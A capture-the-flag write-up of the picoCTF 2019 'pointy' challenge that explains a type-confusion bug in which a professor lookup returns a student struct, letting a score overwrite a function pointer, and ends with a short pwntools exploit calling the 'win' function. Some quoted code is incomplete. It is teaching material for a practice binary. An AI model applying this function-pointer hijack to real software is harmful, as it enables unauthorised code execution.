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pointy - picoCTF 2019

·3 mins
Writeup Pwnable
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Pointy #

What does this program do?

It will make a loop which will:

  1. Create a new student struct and ask for student name

  2. Create a new professor struct and ask for professer name

  3. Search for the student who will give a professor some point

  4. Search for the professor who will be given some point by the student chosen at step 3

  5. Give the professor point

We could clearly see there are some bugs in vuln.c right in the first place

int main (int argc, char **argv)
        printf("Input the name of a student\n");
        struct Student* student = (struct Student*)malloc(sizeof(struct Student));
        ADDRESSES[ADRESSES_TAKEN]=student;	//1: student struct was saved in ADDRESSES array
        printf("Input the name of the favorite professor of a student \n");
        struct Professor* professor = (struct Professor*)malloc(sizeof(struct Professor));
        ADDRESSES[ADRESSES_TAKEN+1]=professor;  //2: professer struct was also saved in ADDRESSES array
        student->scoreProfessor=&giveScoreToProfessor; //3: student->scoreProfessor is a function pointer point to giveScoreToProfessor
        printf("Input the name of the student that will give the score \n");
        char  nameStudent[NAME_SIZE];
        student=(struct Student*) retrieveStudent(nameStudent);
        printf("Input the name of the professor that will be scored \n");
        char nameProfessor[NAME_SIZE];
        professor=(struct Professor*) retrieveProfessor(nameProfessor); //4: struct professor's change depends on retrieveProfessor function
        unsigned int value;
            printf("Input the score: \n");
            scanf("%u", &value);
        student->scoreProfessor(professor, value); //5: point will be given through function scoreProfessor
    return 0;

We can now sense some buggy smell throught that 5 place

struct Professor {
    char name[NAME_SIZE];
    int lastScore;

struct Student {
    char name[NAME_SIZE];
    void (*scoreProfessor)(struct Professor*, int);

The offset of Student->scoreProfessor is the same as Professor->lastScore

void* retrieveProfessor(char * name ){
    for(int i=0; i<ADRESSES_TAKEN;i++){
        if( strncmp(((struct Student*)ADDRESSES[i])->name, name ,NAME_SIZE )==0){
            return ADDRESSES[i];
    puts("person not found... see you!");

The struct student and professor are on the same array, but this retrieveProfessor doesnt check for name if the professor has the same name as the student, this is the critical bug!

So now if we input A as the student name, A as the professor name, A for the student that will give score (bypass the program check).

And finally A as the professor name, the retrieveProfessor will now try to search professor named A but the student named A is at the first index of the array, so the program will give the professor struct variable the student struct, and then because the offset of Student->scoreProfessor is the same as Professor->lastScore, the program will change the function pointer Student->scoreProfessor to the number of point, this was performed in giveScoreToProfessor function of struct student.

void giveScoreToProfessor(struct Professor* professor, int score){
    professor->lastScore=score; // professor->lastScore is actually student->scoreProfessor because the program chose the student struct as professor struct and professor->lastScore is the same offset as student->scoreProfessor
    printf("Score Given: %d \n", score);


And i got this final exploit:

from pwn import *

io = process('./vuln')
elf = ELF('./vuln')

def givescore(student, teacher, StudentGiveScore, teacherBeingGivenScore, score):

givescore(b'A', b'A', b'A', b'A', elf.sym['win'])
givescore(b'lmao', b'bruh', b'A', b'bruh', 1)